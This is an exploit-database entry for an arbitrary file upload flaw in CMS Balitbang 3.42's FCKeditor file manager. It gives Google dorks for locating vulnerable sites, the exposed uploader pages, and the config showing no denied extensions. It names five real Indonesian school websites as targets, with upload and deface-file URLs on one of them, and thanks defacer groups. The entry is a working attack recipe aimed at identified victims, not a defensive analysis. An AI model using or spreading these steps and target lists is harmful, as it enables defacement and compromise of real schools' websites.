CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads Exploit

2011-04-08T00:00:00
ID 1337DAY-ID-15806
Type zdt
Reporter the_cyber_nuxbie
Modified 2011-04-08T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #[~] Author : the_cyber_nuxbie
#[~] Home   : www.nuxbie.zuzzeta.us
#[~] E-mail : [email protected]
#[~] Found  : 06 April 2011.
#[~] Version: CMS Balitbang 3.42.
#[~] Tested : Windows 7 Ultimate 32bit.
#[~] Link   : http://www.kajianwebsite.org/download/CMS%203.42-17082010.rar
#[!] Dork   : inurl:"/html/siswa.php?"
              inurl:"/html/alumni.php?"
              inurl:"/html/guru.php?"
______________________________________________________________


#[~] Exploited:
http://public_html/dir/editor/filemanager/connectors/uploadtest.html
http://public_html/dir/editor/filemanager/connectors/test.html
http://public_html/dir/editor/filemanager/browser/default/browser.html

#[~] Directory:
http://public_html/userfiles/file/file-deface.txt

Setting:
"editor/filemanager/connectors/php/config.php"

$Config['AllowedExtensions']['File']	= array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ;
$Config['DeniedExtensions']['File']		= array() ;
$Config['FileTypesPath']['File']		= $Config['UserFilesPath'] . 'file/' ;
$Config['FileTypesAbsolutePath']['File']= ($Config['UserFilesAbsolutePath'] == '') ? '' : $Config['UserFilesAbsolutePath'].'file/' ;
$Config['QuickUploadPath']['File']		= $Config['UserFilesPath'] ;
$Config['QuickUploadAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ;

- P.o.C:
1. Target:
Special Site:.sch.id (indonesian).
http://www.smpn2muarapinang.sch.id
http://www.sman1gombong.sch.id
http://www.smpn13bdg.sch.id
http://www.pesantrenkrapyak.sch.id
http://www.smkkr2tomohon.sch.id


2. http://www.sman1gombong.sch.id/editor/filemanager/connectors/test.html
   http://www.sman1gombong.sch.id/editor/filemanager/connectors/uploadtest.html

3. Find Your Files:
   http://www.sman1gombong.sch.id/userfiles/file/h4ck3d.txt
   http://www.sman1gombong.sch.id/userfiles/h4ck3d.txt


- Greetz:
All Member YogyaFamilyCode.
All Member IndonesianDefacer.
All Member IndonesianCoder.
All Member MagelangCyber.
All Member Devilzc0de.
All Member Hacker-Newbie.
All Member Jatim-Crew.
All Member Fast-Hacker



- April 7 2011, GMT +07:00 Solo Raya, Indonesia.



#  0day.today [2018-04-04]  #